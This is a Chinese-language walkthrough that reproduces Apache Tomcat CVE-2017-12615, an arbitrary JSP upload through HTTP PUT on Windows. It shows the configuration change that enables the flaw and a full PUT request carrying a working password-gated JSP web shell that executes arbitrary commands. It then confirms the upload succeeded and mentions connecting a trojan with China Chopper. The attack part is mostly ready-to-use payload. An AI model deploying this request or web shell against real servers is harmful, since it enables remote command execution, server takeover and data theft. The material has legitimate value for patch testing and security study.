Tomcat任意文件上传漏洞（CVE-2017-12615）

• 漏洞编号：CVE-2017-12615
• 影响版本：Apache Tomcat 7.0.0 - 7.0.81
• 测试环境：Windows

2017年9月19日，Apache Tomcat 官方确认并修复了高危漏洞（CVE-2017-12615），当 Tomcat 运行在 Windows 操作系统时，且启用了 HTTP PUT 请求方法（例如，将 readonly 初始化参数由默认值设置为 false），攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件，JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。

1、首先，启动Tomcat应用，其映射端口为8080。通过浏览器访问如下：

2、初始化参数
Tomcat 7.x版本内web.xml配置文件内默认配置无readonly参数，需要手工添加，默认配置条件下不受此漏洞影响。所以需要修改下参数，来到Tomcat 7.0\conf下，编辑/web.xml文件，找到途中这个位置手动添加，如下：

3、通过BurpSuite抓取访问对目标系统请求包：

4、修改请求包，加载payload。

PUT /222.jsp/ HTTP/1.1
Host: target-ip:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7vpgj6rn0esqv2shklvuluqc23; tab=0; zbx_sessionid=d3680ae45a4c5bd00d4b99d77cb898dc; JSESSIONID=AA9D9B2CD42185C2A1DBABF92FAEB9D4
Connection: close
Content-Length: 664


<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

提交payload，响应码为201，表明payload上传成功。

此时，已在目标主机的webapps/ROOT目录下生产222.jsp文件

可执行命令。

除此之外，还可以上传“马”通过“中国菜刀”连接。就不在此赘述。
------------复现完毕！----------------